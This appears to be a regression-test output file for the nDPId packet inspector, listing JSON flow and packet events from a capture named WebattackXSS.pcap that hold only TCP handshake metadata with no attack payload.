+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347183714,"flow_last_seen":1499347183714,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347183714,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54484,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1804,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":1,"flow_last_seen":1499347183714,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347183714,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/NBAAD4GyP+sEAABwKgKMtTUAFAdl0YzAAAAAKACchBp+AAAAgQFtAQCCAoBObrjAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1805,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":2,"flow_last_seen":1499347183715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347183715,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1NRZfFQSHZdGNKAScSAtCwAAAgQFtAQCCAoD44xaATm64wEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1807,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":126,"flow_packet_id":3,"flow_last_seen":1499347183715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347183715,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/NFAAD4GyQasEAABwKgKMtTUAFAdl0Y0WXxUE4AQAOXMEQAAAQEICgE5uuQD44xa"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1819,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347186286,"flow_last_seen":1499347186286,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347186286,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54510,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1819,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":1,"flow_last_seen":1499347186286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347186286,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8C2FAAD4Gum+sEAABwKgKMtTuAFDJ67YHAAAAAKACchBLMgAAAgQFtAQCCAoBOb1mAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1820,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":1499347186286,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347186286,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1O6dKYTkyeu2CKAScSCXQgAAAgQFtAQCCAoD447dATm9ZgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1821,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":3,"flow_last_seen":1499347186287,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347186287,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0C2JAAD4GunasEAABwKgKMtTuAFDJ67YInSmE5YAQAOU2SQAAAQEICgE5vWcD447d"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347187548,"flow_last_seen":1499347187548,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347187548,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54524,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":1,"flow_last_seen":1499347187548,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347187548,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8aSdAAD4GXKmsEAABwKgKMtT8AFBu8NeFAAAAAKACchCDZQAAAgQFtAQCCAoBOb6iAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":2,"flow_last_seen":1499347187549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347187549,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1PzTvrB4bvDXhqAScSBsEQAAAgQFtAQCCAoD45AYATm+ogEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":128,"flow_packet_id":3,"flow_last_seen":1499347187549,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347187549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aShAAD4GXLCsEAABwKgKMtT8AFBu8NeG076weYAQAOULGQAAAQEICgE5vqID45AY"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347188799,"flow_last_seen":1499347188799,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347188799,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54538,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1843,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":1,"flow_last_seen":1499347188799,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347188799,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8dE1AAD4GUYOsEAABwKgKMtUKAFDFBMuWAAAAAKACchA3+QAAAgQFtAQCCAoBOb\/bAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1844,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":1499347188799,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347188799,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Qqv+uT2xQTLl6AScSAOsgAAAgQFtAQCCAoD45FRATm\/2wEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1845,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":3,"flow_last_seen":1499347188800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347188800,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0dE5AAD4GUYqsEAABwKgKMtUKAFDFBMuXr\/rk94AQAOWtuQAAAQEICgE5v9sD45FR"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347190051,"flow_last_seen":1499347190051,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347190051,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54552,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1855,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":1,"flow_last_seen":1499347190051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347190051,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88xNAAD4G0rysEAABwKgKMtUYAFBhEDIAAAAAAKACchA0PgAAAgQFtAQCCAoBOcETAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1856,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":2,"flow_last_seen":1499347190051,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347190051,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1RhSQOITYRAyAaAScSBqWwAAAgQFtAQCCAoD45KKATnBEwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":130,"flow_packet_id":3,"flow_last_seen":1499347190052,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347190052,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08xRAAD4G0sOsEAABwKgKMtUYAFBhEDIBUkDiFIAQAOUJYgAAAQEICgE5wRQD45KK"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347191299,"flow_last_seen":1499347191299,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191299,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54566,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1864,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":1,"flow_last_seen":1499347191299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347191299,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8a9RAAD4GWfysEAABwKgKMtUmAFBoHamYAAAAAKACchC0UQAAAgQFtAQCCAoBOcJMAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1865,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":2,"flow_last_seen":1499347191299,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347191299,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Sai+IEWaB2pmaAScSD5ewAAAgQFtAQCCAoD45PCATnCTAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1866,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":131,"flow_packet_id":3,"flow_last_seen":1499347191300,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347191300,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0a9VAAD4GWgOsEAABwKgKMtUmAFBoHamZoviBF4AQAOWYgwAAAQEICgE5wkwD45PC"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347056332,"flow_last_seen":1499347061626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347056332,"flow_last_seen":1499347061626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53152,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347057628,"flow_last_seen":1499347063626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347057628,"flow_last_seen":1499347063626,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53166,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347060176,"flow_last_seen":1499347065627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347060176,"flow_last_seen":1499347065627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53192,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347061452,"flow_last_seen":1499347066629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347061452,"flow_last_seen":1499347066629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53206,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347062740,"flow_last_seen":1499347068629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347062740,"flow_last_seen":1499347068629,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347065288,"flow_last_seen":1499347070631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347065288,"flow_last_seen":1499347070631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347066560,"flow_last_seen":1499347071631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347066560,"flow_last_seen":1499347071631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347191666,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347192547,"flow_last_seen":1499347192547,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347192547,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1876,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":1,"flow_last_seen":1499347192547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347192547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NKNAAD4GkS2sEAABwKgKMtU0AFBlD\/cgAAAAAKACchBokgAAAgQFtAQCCAoBOcODAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":1499347192547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347192547,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1TRgTBA1ZQ\/3IaAScSBgEgAAAgQFtAQCCAoD45T6ATnDgwEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1878,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":3,"flow_last_seen":1499347192547,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347192547,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NKRAAD4GkTSsEAABwKgKMtU0AFBlD\/chYEwQNoAQAOX\/GAAAAQEICgE5w4QD45T6"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347195099,"flow_last_seen":1499347195099,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347195099,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54606,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1897,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":1499347195099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347195099,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oYJAAD4GJE6sEAABwKgKMtVOAFAI3GeAAAAAAKACchBRzQAAAgQFtAQCCAoBOcYCAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1898,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":2,"flow_last_seen":1499347195099,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347195099,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1U4LxrqfCNxngaAScSDw6gAAAgQFtAQCCAoD45d4ATnGAgEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1899,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":3,"flow_last_seen":1499347195100,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347195100,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oYNAAD4GJFWsEAABwKgKMtVOAFAI3GeBC8a6oIAQAOWP8gAAAQEICgE5xgID45d4"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1909,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347196341,"flow_last_seen":1499347196341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347196341,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54620,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 